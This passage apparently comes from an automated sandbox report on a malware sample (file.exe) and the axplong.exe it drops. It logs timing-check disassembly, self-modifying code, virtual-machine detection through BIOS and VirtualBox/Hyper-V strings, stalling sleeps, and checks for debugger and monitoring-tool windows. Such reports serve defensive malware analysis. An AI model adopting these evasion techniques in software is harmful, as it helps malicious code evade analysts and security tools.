                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB001 second address: AEB075 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD4A4ED8670h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007FD4A4ED866Fh 0x00000013 pop eax 0x00000014 movsx edx, si 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FD4A4ED8668h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 add dword ptr [ebp+122D25ADh], ebx 0x00000039 push 00000000h 0x0000003b mov edx, dword ptr [ebp+122D3972h] 0x00000041 push 00000003h 0x00000043 mov edi, esi 0x00000045 call 00007FD4A4ED8669h 0x0000004a pushad 0x0000004b push ebx 0x0000004c je 00007FD4A4ED8666h 0x00000052 pop ebx 0x00000053 push ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB075 second address: AEB0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD4A4C546A9h 0x00000018 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB0A1 second address: AEB0B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4ED8670h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB0B6 second address: AEB0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB0C4 second address: AEB0C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB183 second address: AEB236 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FD4A4C546A9h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 07F38B51h 0x00000012 pushad 0x00000013 jl 00007FD4A4C5469Ch 0x00000019 mov esi, dword ptr [ebp+122D3A46h] 0x0000001f mov edx, dword ptr [ebp+122D1C2Fh] 0x00000025 popad 0x00000026 push 00000003h 0x00000028 mov di, B704h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D25F3h], ebx 0x00000034 push 00000003h 0x00000036 or ecx, 60972FFDh 0x0000003c call 00007FD4A4C54699h 0x00000041 push esi 0x00000042 push edx 0x00000043 jmp 00007FD4A4C546A1h 0x00000048 pop edx 0x00000049 pop esi 0x0000004a push eax 0x0000004b jnl 00007FD4A4C5469Ch 0x00000051 mov eax, dword ptr [esp+04h] 0x00000055 pushad 0x00000056 push ecx 0x00000057 jnp 00007FD4A4C54696h 0x0000005d pop ecx 0x0000005e push esi 0x0000005f jo 00007FD4A4C54696h 0x00000065 pop esi 0x00000066 popad 0x00000067 mov eax, dword ptr [eax] 0x00000069 jc 00007FD4A4C546A3h 0x0000006f jmp 00007FD4A4C5469Dh 0x00000074 mov dword ptr [esp+04h], eax 0x00000078 pushad 0x00000079 push eax 0x0000007a push edx 0x0000007b jo 00007FD4A4C54696h 0x00000081 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB236 second address: AEB27E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD4A4ED8675h 0x0000000f popad 0x00000010 pop eax 0x00000011 movzx esi, ax 0x00000014 lea ebx, dword ptr [ebp+1245FD9Dh] 0x0000001a mov edx, dword ptr [ebp+122D3962h] 0x00000020 xchg eax, ebx 0x00000021 jmp 00007FD4A4ED8670h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB27E second address: AEB296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB296 second address: AEB2A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD4A4ED8666h 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB35D second address: AEB39A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FD4A4C546A7h 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007FD4A4C5469Fh 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pop esi 0x00000021 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AEB39A second address: AEB3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FD4A4ED8666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80337 second address: 4C80346 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80346 second address: 4C8034C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8034C second address: 4C80350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80350 second address: 4C80354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80354 second address: 4C803A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007FD4A4C546A7h 0x0000000f push 31C9C541h 0x00000014 pushad 0x00000015 mov ax, bx 0x00000018 mov eax, edx 0x0000001a popad 0x0000001b xor dword ptr [esp], 46880559h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD4A4C546A6h 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803A0 second address: 4C803A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803A6 second address: 4C803AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C803AA second address: 4C80468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 3D660330h 0x0000000d pushad 0x0000000e mov edx, ecx 0x00000010 push ecx 0x00000011 pushfd 0x00000012 jmp 00007FD4A4ED8677h 0x00000017 xor esi, 199EAC8Eh 0x0000001d jmp 00007FD4A4ED8679h 0x00000022 popfd 0x00000023 pop esi 0x00000024 popad 0x00000025 xor dword ptr [esp], 4A5EAD30h 0x0000002c jmp 00007FD4A4ED8677h 0x00000031 mov eax, dword ptr fs:[00000000h] 0x00000037 jmp 00007FD4A4ED8676h 0x0000003c nop 0x0000003d jmp 00007FD4A4ED8670h 0x00000042 push eax 0x00000043 pushad 0x00000044 mov ecx, 53F879F3h 0x00000049 popad 0x0000004a nop 0x0000004b jmp 00007FD4A4ED8676h 0x00000050 sub esp, 1Ch 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80468 second address: 4C8046C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8046C second address: 4C80489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80489 second address: 4C804DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD4A4C546A3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD4A4C546A6h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD4A4C5469Ch 0x0000001b or ah, 00000018h 0x0000001e jmp 00007FD4A4C5469Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804DA second address: 4C804E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED866Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C804E9 second address: 4C805B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FD4A4C5469Eh 0x00000011 xchg eax, esi 0x00000012 pushad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FD4A4C5469Ch 0x0000001a add al, 00000008h 0x0000001d jmp 00007FD4A4C5469Bh 0x00000022 popfd 0x00000023 mov eax, 080DA87Fh 0x00000028 popad 0x00000029 pushfd 0x0000002a jmp 00007FD4A4C546A4h 0x0000002f jmp 00007FD4A4C546A5h 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 mov ecx, edx 0x0000003a mov edx, 64207FAEh 0x0000003f popad 0x00000040 xchg eax, esi 0x00000041 jmp 00007FD4A4C546A5h 0x00000046 xchg eax, edi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a jmp 00007FD4A4C546A3h 0x0000004f call 00007FD4A4C546A8h 0x00000054 pop ecx 0x00000055 popad 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C805B9 second address: 4C80605 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8670h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, CEh 0x0000000d pushad 0x0000000e mov bl, ah 0x00000010 jmp 00007FD4A4ED8675h 0x00000015 popad 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 jmp 00007FD4A4ED866Eh 0x0000001d mov eax, dword ptr [7743B370h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80605 second address: 4C80609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80609 second address: 4C8060D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8060D second address: 4C80613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80613 second address: 4C80663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007FD4A4ED8670h 0x00000011 xor eax, ebp 0x00000013 pushad 0x00000014 mov edi, 5E25ABA2h 0x00000019 popad 0x0000001a nop 0x0000001b jmp 00007FD4A4ED8674h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80663 second address: 4C80669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80669 second address: 4C8066E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8066E second address: 4C806BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD4A4C5469Bh 0x0000000a sbb ah, FFFFFFFEh 0x0000000d jmp 00007FD4A4C546A9h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 nop 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD4A4C546A8h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C806BB second address: 4C806C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C806C1 second address: 4C80710 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b pushad 0x0000000c jmp 00007FD4A4C5469Bh 0x00000011 mov bh, ah 0x00000013 popad 0x00000014 mov dword ptr fs:[00000000h], eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FD4A4C546A1h 0x00000021 add ax, 8AF6h 0x00000026 jmp 00007FD4A4C546A1h 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e mov bx, cx 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80710 second address: 4C80714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80714 second address: 4C807CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov esi, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov ecx, 464FB3FBh 0x00000010 call 00007FD4A4C546A0h 0x00000015 jmp 00007FD4A4C546A2h 0x0000001a pop eax 0x0000001b popad 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f jmp 00007FD4A4C546A1h 0x00000024 test eax, eax 0x00000026 jmp 00007FD4A4C5469Eh 0x0000002b jne 00007FD517313C4Eh 0x00000031 jmp 00007FD4A4C546A0h 0x00000036 sub eax, eax 0x00000038 jmp 00007FD4A4C546A1h 0x0000003d mov dword ptr [ebp-20h], eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FD4A4C546A3h 0x00000049 add cl, FFFFFFFEh 0x0000004c jmp 00007FD4A4C546A9h 0x00000051 popfd 0x00000052 mov ah, B9h 0x00000054 popad 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C807CF second address: 4C80843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 694C8A3Fh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [esi] 0x0000000f jmp 00007FD4A4ED8670h 0x00000014 mov dword ptr [ebp-24h], ebx 0x00000017 pushad 0x00000018 mov edi, ecx 0x0000001a pushfd 0x0000001b jmp 00007FD4A4ED866Ah 0x00000020 xor si, 1A58h 0x00000025 jmp 00007FD4A4ED866Bh 0x0000002a popfd 0x0000002b popad 0x0000002c test ebx, ebx 0x0000002e jmp 00007FD4A4ED8676h 0x00000033 je 00007FD517597ABAh 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c call 00007FD4A4ED866Dh 0x00000041 pop esi 0x00000042 mov dh, 9Eh 0x00000044 popad 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80843 second address: 4C80849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C80849 second address: 4C8084D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8084D second address: 4C80851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E7D second address: 4C70E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6201ED24h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov eax, 750EA8CBh 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E98 second address: 4C70E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70E9C second address: 4C70EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70EA2 second address: 4C70EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C70EA8 second address: 4C70EAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: AE956F second address: AE957D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jne 00007FD4A4C54696h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe RDTSC instruction interceptor: First address: AEAEA5 second address: AEAEE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push esi 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 jmp 00007FD4A4C546A4h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD4A4C5469Ch 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D5EAE3 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F0F84A instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F229BB instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D5EAB0 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F9B69A instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 95EAE3 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: B0F84A instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: B229BB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: B9B69A instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04CD0306 rdtsc 0_2_04CD0306
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 2030
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 419
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 2002
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 2036
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5208 Thread sleep count: 48 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5208 Thread sleep time: -96048s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6188 Thread sleep count: 51 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6188 Thread sleep time: -102051s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6192 Thread sleep count: 2030 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6192 Thread sleep time: -4062030s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1088 Thread sleep count: 419 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1088 Thread sleep time: -12570000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4896 Thread sleep time: -1440000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5260 Thread sleep count: 57 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5260 Thread sleep time: -114057s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3640 Thread sleep count: 43 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3640 Thread sleep time: -86043s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3652 Thread sleep count: 309 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3652 Thread sleep time: -618309s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2740 Thread sleep count: 2002 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2740 Thread sleep time: -4006002s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5912 Thread sleep count: 2036 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5912 Thread sleep time: -4074036s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
                    Source: axplong.exe, axplong.exe, 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000006.00000002.3389125760.0000000001348000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW-
                    Source: axplong.exe, 00000006.00000002.3389125760.00000000013BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: axplong.exe, 00000006.00000002.3389125760.000000000137A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
                    Source: file.exe, 00000000.00000002.2190504154.0000000000EF0000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2220629533.0000000000AF0000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2220950563.0000000000AF0000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_052F040C Start: 052F049C End: 052F0496 6_2_052F040C
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
